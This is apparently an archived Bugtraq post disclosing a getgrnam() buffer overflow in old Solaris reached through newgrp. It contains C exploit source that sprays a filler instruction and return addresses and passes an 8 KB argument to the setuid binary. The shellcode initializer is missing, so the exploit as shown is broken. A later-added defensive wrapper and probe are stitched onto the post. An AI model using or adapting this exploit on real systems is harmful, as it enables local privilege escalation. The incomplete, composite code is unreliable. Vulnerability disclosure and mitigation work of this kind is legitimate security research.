Bugtraq mailing list archives

Old getgrnam() Solaris 2.5 vulnerability
From: Pablo Sor <psor () AFIP GOV AR>
Date: Thu, 4 Jan 2001 11:03:47 -0300


Old versions of Solaris, 2.5/2.5.1 (without patch), contain an
exploitable buffer overflow in the getgrnam() libc function.
Sorry if this is already known; it seems an old problem, but I failed
searching for it in the Bugtraq archives.
This vulnerability may be used through the newgrp command.


Pablo Sor
psor () afip gov ar

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
   getgrnam() function overflow.

   works against Solaris 2.5.1 (SPARC)
   default offset should work.

   Pablo Sor, Buenos Aires, Argentina.
   psor () afip gov ar
*/

u_char shell[] =   /* initializer not present in the archived copy of this post */

/* current stack pointer (SPARC: %sp returned through %i0) */
u_long get_sp(void)
{
   __asm__("mov %sp,%i0 \n");
}

void main()
{
 long *p;
 long addr;
 char buf[8300];
 int i;

 addr = get_sp()-8096;               /* default offset from the stack pointer */
 printf("Jumping to address %p\n",addr);
 p = (long *) buf;
 for (i=0;i<2050;++i) *(p++) = 0xa61cc013;
 for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];
 p = (long *) &buf[8160];
 for (i=0;i<30;++i) *(p++) = addr;
 execl("/usr/bin/newgrp","newgrp",buf,(char *)0);   /* ~8 KB group name as argv[1] */
}
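The post shows that newgrp hands its argument straight to getgrnam(), so an oversized group name reaches a fixed-size buffer inside libc. The following is an added defender-side example, not part of the original post or of Solaris: a bounded wrapper that any setuid caller of getgrnam() could use to reject implausibly long names before libc sees them, plus a harmless probe that feeds libc a name of the same length the post uses (filled with 'A', no payload) and reports whether the call returned cleanly. The wrapper name, the 256-byte limit and the probe are assumptions of this example.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed limit for this example: far longer than any real group
 * name, far shorter than the ~8 KB argument the exploit above passes. */
#define MAX_GROUPNAME_LEN 256

/* Hypothetical wrapper: refuse empty, NULL or over-long names so the
 * lookup never reaches libc. Rejections return NULL with errno = EINVAL. */
struct group *bounded_getgrnam(const char *name)
{
    size_t n = 0;

    if (name == NULL) {
        errno = EINVAL;
        return NULL;
    }
    /* count at most MAX_GROUPNAME_LEN + 1 bytes; never scan the whole string */
    while (n <= MAX_GROUPNAME_LEN && name[n] != '\0')
        n++;
    if (n == 0 || n > MAX_GROUPNAME_LEN) {
        errno = EINVAL;
        return NULL;
    }
    return getgrnam(name);
}

/* Returns 1 if the wrapper rejects a constructed name of `len` bytes
 * with EINVAL, 0 otherwise. */
int bounded_rejects_len(size_t len)
{
    char *name = malloc(len + 1);
    struct group *gr;
    int rejected;

    if (name == NULL)
        return 0;
    memset(name, 'A', len);
    name[len] = '\0';
    errno = 0;
    gr = bounded_getgrnam(name);
    rejected = (gr == NULL && errno == EINVAL);
    free(name);
    return rejected;
}

/* Probe the real libc with a `len`-byte name made of 'A's (no group of
 * that name exists). Returns 1 if getgrnam() came back with NULL as it
 * should; a libc with the overflow described in the post would not be
 * expected to return normally from this call at all. */
int probe_getgrnam_long_name(size_t len)
{
    char *name = malloc(len + 1);
    struct group *gr;

    if (name == NULL)
        return 0;
    memset(name, 'A', len);
    name[len] = '\0';
    gr = getgrnam(name);
    free(name);
    return gr == NULL;
}

int main(void)
{
    printf("8300-byte name rejected by wrapper: %s\n",
           bounded_rejects_len(8300) ? "yes" : "no");
    printf("16-byte unknown name rejected by wrapper: %s\n",
           bounded_rejects_len(16) ? "yes" : "no (passed to libc)");
    printf("libc getgrnam() with 8300-byte name returned cleanly: %s\n",
           probe_getgrnam_long_name(8300) ? "yes" : "no");
    return 0;
}
```

The wrapper is the mitigation a caller can apply regardless of which libc it links against; the probe is a regression check to run after applying the vendor patch, since a fixed getgrnam() simply returns NULL for the long name.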

